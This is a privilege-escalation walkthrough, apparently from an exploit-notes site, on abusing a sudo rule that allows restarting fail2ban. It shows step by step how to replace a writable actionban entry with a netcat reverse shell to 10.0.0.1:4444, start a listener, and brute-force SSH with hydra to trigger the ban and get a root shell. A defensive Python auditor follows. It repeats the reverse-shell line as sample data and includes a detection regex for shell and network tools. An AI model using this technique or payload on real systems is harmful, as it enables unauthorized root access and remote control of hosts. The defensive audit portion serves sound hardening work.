# Sudo Fail2ban Privilege Escalation

**Fail2ban** is an intrusion prevention software framework.\
It protects against brute-force attacks by banning hosts that generate repeated failures.

### [Investigation](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation/#investigation)

```sh
sudo -l

(root) NOPASSWD: /etc/init.d/fail2ban restart
```

If we can restart **"fail2ban"** as root, we can escalate privileges by modifying its configuration, provided the configuration files are writable.\
We need to check whether any of them are writable by the current user.

```sh
find /etc -writable -ls 2>/dev/null

4 drwxrwx--- 2 root security  4096 Oct 16 08:57 /etc/fail2ban/action.d
```

Look inside **"/etc/fail2ban/jail.conf"** to learn how fail2ban is configured.

```sh
less /etc/fail2ban/jail.conf

# ---------------------------------------------

# output

...
# "bantime" is the number of seconds that a host is banned.
bantime  = 10s

# A host is banned if it has generated "maxretry" during the last "findtime"
# seconds.
findtime  = 10s

# "maxretry" is the number of failures before a host get banned.
maxretry = 5
...
```

### [Exploitation](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation/#exploitation)

#### [1. Modify the Configuration File](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation/#1.-modify-the-configuration-file)

For privilege escalation, we need to update **"iptables-multiport.conf"**.\
Specifically, insert a payload into one of the following values.

* **actionstart**
* **actionstop**
* **actioncheck**
* **actionban**
* **actionunban**

Here we update **actionban**, the command fail2ban runs when it bans a host after repeated failed logins.\
Copy **iptables-multiport.conf** to the current user's home directory.

```sh
ls -al /etc/fail2ban/action.d/iptables-multiport.conf
# copy this file into the home directory for editing the content
cp /etc/fail2ban/action.d/iptables-multiport.conf ~
```

Now modify the file.

```sh
vim ~/iptables-multiport.conf
```

We insert a reverse shell payload into **actionban**.

```sh
actionban = /usr/bin/nc 10.0.0.1 4444 -e /bin/bash
```

Then move the modified file back to its original location.

```sh
mv ~/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf
```

To apply the new configuration, restart fail2ban as root.

```sh
sudo /etc/init.d/fail2ban restart
```

#### [2. Trigger the Action](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation/#2.-trigger-the-action)

Start a listener on the local machine.

```sh
nc -lvnp 4444
```

Log in with wrong passwords repeatedly until we get banned.\
**hydra** is useful for this.

```sh
hydra -l root -P passwords.txt <target-ip> ssh
```

After a short time, you will get a root shell via the listener.
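The two weaknesses this technique depends on are both auditable: an `action.d` tree that a non-root user can write to, and an `action*` value that has been swapped from a firewall call to an arbitrary program. The following is an added defensive example, not code from the original page or from the fail2ban project. It walks a fail2ban configuration tree, flags files or directories that are not root-owned or carry group/world write bits, and parses every `action.d/*.conf` for `actionstart`/`actionstop`/`actioncheck`/`actionban`/`actionunban` commands that invoke a shell or network tool. The list of suspicious binaries is a heuristic I chose for illustration, and the sample tree (a group-writable `action.d` holding one tampered file) is constructed inline to mirror the page.

```python
"""Audit a fail2ban config tree for writable action files and hijacked action commands.

Added defensive example (not part of the page or of fail2ban). Point run_audit()
at /etc/fail2ban on a real host; demo() builds a constructed sample tree instead.
"""
import configparser
import os
import re
import stat
import tempfile

# Heuristic (an assumption for this example): programs that have no business
# appearing in a fail2ban action definition, which should only call the firewall.
SUSPICIOUS = re.compile(r"(^|[\s/])(nc|ncat|netcat|bash|sh|python3?|perl|socat)(\s|$)")
ACTION_KEYS = ("actionstart", "actionstop", "actioncheck", "actionban", "actionunban")

# Constructed sample action files. BENIGN mirrors the shape of a stock
# iptables-multiport.conf; TAMPERED carries the page's reverse-shell actionban.
BENIGN = """[INCLUDES]
before = iptables-common.conf

[Definition]
actionstart = <iptables> -N f2b-<name>
              <iptables> -A f2b-<name> -j <returntype>
actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>
actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>
"""
TAMPERED = BENIGN.replace(
    "actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>",
    "actionban = /usr/bin/nc 10.0.0.1 4444 -e /bin/bash",
)


def audit_permissions(root, expected_uid=0):
    """Return (path, reason) for every entry under root that a non-root user
    could modify: wrong owner, or group/world write bit set."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for path in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
            st = os.lstat(path)
            if st.st_uid != expected_uid:
                findings.append((path, "owner uid %d, expected %d" % (st.st_uid, expected_uid)))
            elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((path, "group/world writable, mode %o" % stat.S_IMODE(st.st_mode)))
    return findings


def suspicious_actions(conf_text):
    """Parse one action file's [Definition] section and return the (key, command)
    pairs whose command matches the SUSPICIOUS heuristic."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(conf_text)
    if not parser.has_section("Definition"):
        return []
    hits = []
    for key in ACTION_KEYS:
        value = parser.get("Definition", key, fallback="")
        if SUSPICIOUS.search(value):
            hits.append((key, value.strip()))
    return hits


def audit_actions(action_dir):
    """Scan every *.conf in action.d; return (file, key, command) for suspicious commands."""
    findings = []
    for name in sorted(os.listdir(action_dir)):
        if not name.endswith(".conf"):
            continue
        with open(os.path.join(action_dir, name)) as fh:
            findings.extend((name, key, cmd) for key, cmd in suspicious_actions(fh.read()))
    return findings


def run_audit(root, expected_uid=0):
    """Combine both checks into one report for the tree rooted at `root`."""
    return {
        "permissions": audit_permissions(root, expected_uid),
        "actions": audit_actions(os.path.join(root, "action.d")),
    }


def build_sample_tree():
    """Create a constructed tree: group-writable action.d (drwxrwx--- as in the
    page's find output) containing one benign and one tampered action file."""
    root = tempfile.mkdtemp(prefix="f2b-audit-")
    action_d = os.path.join(root, "action.d")
    os.mkdir(action_d)
    for name, text in (("iptables-allports.conf", BENIGN), ("iptables-multiport.conf", TAMPERED)):
        path = os.path.join(action_d, name)
        with open(path, "w") as fh:
            fh.write(text)
        os.chmod(path, 0o640)
    os.chmod(action_d, 0o770)
    os.chmod(root, 0o755)
    return root


def demo():
    """Audit the constructed tree. It is owned by the current user rather than
    root, so expected_uid is set accordingly; on a real host keep the default 0."""
    return run_audit(build_sample_tree(), expected_uid=os.getuid())


if __name__ == "__main__":
    report = demo()
    for path, why in report["permissions"]:
        print("PERMISSION  %s: %s" % (path, why))
    for fname, key, cmd in report["actions"]:
        print("ACTION      %s: %s = %s" % (fname, key, cmd))
```

On a production host the expected result of `run_audit("/etc/fail2ban")` is two empty lists; any permission finding means the `sudo ... fail2ban restart` rule becomes a root shell for whoever holds that write access, and any action finding is evidence that the tampering has already happened.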

